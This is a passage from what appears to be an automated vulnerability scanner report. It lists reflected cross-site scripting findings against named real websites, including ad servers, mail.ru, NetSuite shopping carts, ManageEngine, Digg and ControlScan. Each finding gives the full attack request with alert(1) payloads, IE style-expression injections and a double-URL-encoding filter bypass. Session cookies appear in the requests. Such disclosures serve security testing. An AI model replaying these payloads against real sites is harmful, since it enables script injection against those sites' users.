GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742451474-635361&mboxCount=1&mbox=overall_conversion_tracking-mbox7a431<script>alert(1)</script>ce4081a25f0&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28 HTTP/1.1
Host: mbox5.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 146
Date: Mon, 25 Apr 2011 15:18:18 GMT
Server: Test & Target

mboxFactoryDefault.get('overall_conversion_tracking-mbox7a431<script>alert(1)</script>ce4081a25f0',0).setOffer(new mboxOfferDefault()).activate();

5.28. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox9e.offermatica.com
Path:	/m2/eset/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 221f6<script>alert(1)</script>458371fa13e was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con221f6<script>alert(1)</script>458371fa13e&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 209
Date: Mon, 25 Apr 2011 13:00:35 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con221f6<script>alert(1)</script>458371fa13e',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");

5.29. http://ok.mail.ru/cookie-token.do [client_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ok.mail.ru
Path:	/cookie-token.do

Issue detail

The value of the client_id request parameter is copied into the HTML document as plain text between tags. The payload fa439<script>alert(1)</script>b93be018b2a was submitted in the client_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookie-token.do?client_id=247552fa439<script>alert(1)</script>b93be018b2a&remove=true HTTP/1.1
Host: ok.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=CBEE3BB859A85F56E2B5BB4ED4C1D0AC; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 243
Date: Mon, 25 Apr 2011 14:35:03 GMT
Connection: close

<html>

<head>
</head>
<body>
Failed to convert value of type [java.lang.String] to required type [long]; nested exception is java.lang.NumberFormatException: For input string: "247552fa439<script>alert(1)</script>b93be018b2a"
</body>
...[SNIP]...

5.30. http://ok.mail.ru/cookie-token.do [remove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ok.mail.ru
Path:	/cookie-token.do

Issue detail

The value of the remove request parameter is copied into the HTML document as plain text between tags. The payload 39088<script>alert(1)</script>7c14da063e7 was submitted in the remove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookie-token.do?client_id=247552&remove=true39088<script>alert(1)</script>7c14da063e7 HTTP/1.1
Host: ok.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=A90368686F081A1B6C976FE1037576C9; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 251
Date: Mon, 25 Apr 2011 14:35:13 GMT
Connection: close

<html>

<head>
</head>
<body>
Failed to convert value of type [java.lang.String] to required type [boolean]; nested exception is java.lang.IllegalArgumentException: Invalid boolean value [true39088<script>alert(1)</script>7c14da063e7]
</body>
...[SNIP]...

5.31. http://pixel.fetchback.com/serve/fb/pdc [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload d41e8<x%20style%3dx%3aexpression(alert(1))>15991bc29e6 was submitted in the name parameter. This input was echoed as d41e8<x style=x:expression(alert(1))>15991bc29e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landingd41e8<x%20style%3dx%3aexpression(alert(1))>15991bc29e6&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1303744450_1660:564778; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: uid=1_1303744450_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: kwd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: sit=1_1303744450_2451:52878:47778_3236:210841:210723_782:565127:564778; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: cre=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: bpd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: apd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: scg=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: ppd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: afl=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:14:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

5.32. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/dynamic_preroll_playlist.fmil

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload ac54b<script>alert(1)</script>be10ff58fe0 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360ac54b<script>alert(1)</script>be10ff58fe0&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:19 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA34AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:54:19 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21626
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_JmFVc7buonLLfA; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:54:19 GMT; Path=/
Content-Type: application/smil
Content-Length: 3140
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360ac54b<script>alert(1)</script>be10ff58fe0" background-color="black" />
...[SNIP]...

5.33. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/dynamic_preroll_playlist.fmil

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 8df88<script>alert(1)</script>a5595a30893 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=4808df88<script>alert(1)</script>a5595a30893&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:09 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA34AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:54:09 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21628
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_0ZcJJ0MjgsoTEf; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:54:09 GMT; Path=/
Content-Type: application/smil
Content-Length: 3140
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="4808df88<script>alert(1)</script>a5595a30893" height="360" background-color="black" />
...[SNIP]...

5.34. http://shopping.netsuite.com/s.nl [alias parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44891'style%3d'x%3aexpression(alert(1))'9a7dd871708 was submitted in the alias parameter. This input was echoed as 44891'style='x:expression(alert(1))'9a7dd871708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /s.nl?alias=44891'style%3d'x%3aexpression(alert(1))'9a7dd871708&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:15:54 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233571352:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 55003

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/44891'style='x:expression(alert(1))'9a7dd871708?whence=&c=438708&n=1'>
...[SNIP]...

5.35. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6483e'style='x:expression(alert(1))'be136aaa48c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:20:44 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1564875036:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54762

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/s.nl?c=438708&sc=3&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1&whence=&6483e'style='x:expression(alert(1))'be136aaa48c=1&6483e%27style%3d%27x%3aexpression%28alert%281%29%29%27be136aaa48c=1&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8'>
...[SNIP]...

5.36. http://tools.manageengine.com/forums/security-manager/forum.php [char parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tools.manageengine.com
Path:	/forums/security-manager/forum.php

Issue detail

The value of the char request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 78007%3balert(1)//2b991119c48 was submitted in the char parameter. This input was echoed as 78007;alert(1)//2b991119c48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forums/security-manager/forum.php?limit=5&char=2578007%3balert(1)//2b991119c48 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/security-manager-forum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64452

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a class=\"forumTitle\" target=\"_blank\" href='http://forums.manageengine.com/#Topic/"+rem[i].tpid+"'>"+forumtitle.substring(0,2578007;alert(1)//2b991119c48)+"...</a>
...[SNIP]...

5.37. http://widgets.digg.com/buttons/count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload b0826<script>alert(1)</script>044029140f9 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.htmlb0826<script>alert(1)</script>044029140f9 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 25 Apr 2011 12:10:55 GMT
Via: NS-CACHE: 100
Etag: "3112ca90777458234aafe3bc78669cb02bb4b372"
Content-Length: 191
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Mon, 25 Apr 2011 12:20:54 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.htmlb0826<script>alert(1)</script>044029140f9", "diggs": 0});

5.38. https://www.controlscan.com/save_order.php [company parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.controlscan.com
Path:	/save_order.php

Issue detail

The value of the company request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c8d1'%3balert(1)//ee74115e8d1 was submitted in the company parameter. This input was echoed as 3c8d1';alert(1)//ee74115e8d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /save_order.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/checkout.php
Cache-Control: max-age=0
Origin: https://www.controlscan.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac
Content-Length: 348

total=747.00&firstname=%27&lastname=%27&company=%27%273c8d1'%3balert(1)//ee74115e8d1&email=%27%40%3B.net&phone=111-222-3334&merchantID=&ipscan=10.0.1.1&cardfname=1&cardlname=1&address1=1&address2=1&city=dg&country=us&province=&state=AL&zipcode=09876&cardtype=MC&cardnumber=54636345635
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:57:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
/*globals YWA*/
var YWATracker = YWA.getTracker("1000725800122");
YWATracker.setMemberId('''3c8d1';alert(1)//ee74115e8d1_');/*
YWATracker.setDocumentName("");
YWATracker.setDocumentGroup("");
*/
YWATracker.submit();
</script>
...[SNIP]...

5.39. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.fusionvm.com
Path:	/FusionVM/DesktopDefault.aspx

Issue detail

The value of the _IG_CALLBACK request parameter is copied into the HTML document as plain text between tags. The payload 5a188<script>alert(1)</script>e5eb79051f was submitted in the _IG_CALLBACK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

